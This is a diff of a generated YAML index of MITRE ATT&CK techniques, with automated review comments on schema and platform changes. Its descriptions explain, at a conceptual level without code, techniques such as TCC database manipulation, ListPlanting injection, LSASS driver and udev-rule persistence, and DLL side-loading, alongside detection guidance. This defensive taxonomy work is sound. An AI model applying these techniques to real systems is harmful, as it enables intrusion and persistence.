directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -22808,12 +23091,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -22863,12 +23145,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -22901,9 +23182,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
@@ -22920,9 +23202,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
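Review bot: the platform change on these lines replaces two values (`Office 365`, `Google Workspace`) with one (`Office Suite`) and bumps `x_mitre_version` to '2.2'; anything that filters this data by platform string will silently stop matching T1098.002, so any platform-keyed output derived from this file needs regenerating in the same change, and the commit message should call out the rename. The T1484 hunk further down does the same (`Azure AD`, `SaaS` → `Identity Provider`, version '3.1').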
@@ -22968,38 +23249,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
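Review bot: the new `description: |+` uses the keep chomping indicator and the block is followed by an empty `+` line, so the value now ends in two newlines instead of one; the other multi-line descriptions in this file use `|-` (T1134.005 and T1574.009 above), and the old double-quoted form ended with a single `\n`. Use `|` (or `|-`) and drop the trailing blank line so the scalar round-trips like its neighbours; with `|+` the value also changes whenever the number of blank lines after it changes, which is fragile under regeneration.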
@@ -23007,6 +23269,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -23014,7 +23278,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -23044,7 +23308,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -23090,7 +23353,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -23135,8 +23398,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
@@ -23162,7 +23423,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -23188,59 +23449,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
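Review bot: none of the fields removed in this hunk are actually lost (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the four `external_references` entries all reappear in the two hunks that follow, reordered after the data sources), so the substantive changes are the `modified` jump from 2022-05-11 to 2024-08-14, the `x_mitre_version` bump to '1.1', and the new `(Citation: Hexacorn Listplanting)` tag in the description, which only resolves because the matching `Hexacorn Listplanting` entry is added to `external_references` below; keep both halves in the same commit. Because most of the diff is key reordering, it would be far easier to review if the generator emitted keys in a stable order.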
@@ -23257,6 +23487,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -23271,21 +23504,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23330,9 +23594,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
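Review bot: in the `x_mitre_platforms` change for T1484, `SaaS` is removed outright rather than renamed, while `Azure AD` becomes `Identity Provider`; any view or index keyed on the `SaaS` platform therefore loses T1484 entirely after this change. Confirm that is what the upstream object carries at `x_mitre_version: '3.1'` and not a side effect of the generator's platform mapping, and mention the platform rename in the commit message so downstream consumers know to update their filters.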
@@ -23389,8 +23652,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -23399,7 +23662,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
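Review bot: the `- spec_version: '2.1'` removal here for T1484 is repeated for every technique below (T1547.008, T1078.004, T1053.002, T1055.001, T1546.007, T1574.004, T1078.003, T1574.012, T1053.005, T1047, T1129, T1059.007, T1053.007, T1559.002, T1204.002), which silently changes the object schema in the index: anything that validates these entries as STIX 2.1 objects will now fail on the missing required `spec_version` property, while `x_mitre_attack_spec_version` is kept. If the upstream bundle stopped emitting the field, say so in the commit message; if the generator dropped it, have the generator re-add it.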
@@ -23441,7 +23703,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
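Review bot: the `modified` timestamp for T1547.008 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-20T16:34:43.405Z`, and the same regression appears later for T1546.007 (`2022-05-11` to `2022-04-20`), T1574.004 (`2023-10-31` to `2023-03-30`) and T1574.012 (`2022-04-25` to `2021-08-30`). The old values all share the `14:00:00.188Z` suffix, which reads like a bulk release stamp rather than an edit time, so this run is probably reading a different ATT&CK artefact than the previous one. State which ATT&CK release or bundle the index was generated from so a reviewer can confirm these are the authoritative values and not a stale source.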
@@ -23466,12 +23728,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23511,8 +23772,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
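Review bot: the `+ x_mitre_attack_spec_version: 3.2.0` and `+ x_mitre_modified_by_ref` lines added here for T1078.004 are the same keys removed from the bottom of the entry in the hunk at `@@ -23557,17 +23820,14 @@`; the only semantic changes in this entry are the new contributor line (`- Arun Seelagan, CISA`) and the platform/version edits. Emitting keys in a fixed, sorted order from the generator would keep diffs like this down to the lines that actually changed.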
@@ -23520,13 +23783,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
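Review bot: `Azure AD`, `Office 365` and `Google Workspace` are replaced by `Office Suite` and `Identity Provider` in `x_mitre_platforms` for T1078.004 (`SaaS` and `IaaS` stay). Anything keyed on the old platform strings, including per-platform index files and any atomic test whose `supported_platforms` still lists the old names, will stop matching this technique; confirm the generator's platform-to-file mapping was updated in the same change, and call the rename out in the commit message since the object itself only moves from `1.7` to `1.8`.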
@@ -23557,17 +23820,14 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
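Review bot: the sentence added to the T1053.002 description introduces `Win32_ScheduledJob` as a WMI route to `at` scheduling, but the same paragraph already states that `at` is deprecated on Windows in favour of `schtasks` and requires the Task Scheduler service plus local Administrators membership; `Win32_ScheduledJob` represents exactly those AT-style jobs, so the text should say whether the WMI route carries the same limitation. Without that, a detection scoped on `Win32_ScheduledJob` activity will be expected on hosts where the class cannot create jobs at all. This is upstream ATT&CK text, so raise it there rather than hand-editing the index.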
@@ -23630,7 +23890,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -23664,8 +23924,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -23674,6 +23934,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
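Review bot: the new `Malicious Life by Cybereason` reference URL ends in `#blog-subscribe`, a fragment for the page's subscription widget rather than the article; strip it so the URL is `https://www.cybereason.com/blog/wmi-lateral-movement-win32`. The `description` is also `(n.d.)` while the neighbouring entries carry a date. Both values come from upstream ATT&CK, so fix them there and regenerate instead of editing the index by hand.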
@@ -23686,7 +23950,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -23789,9 +24052,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
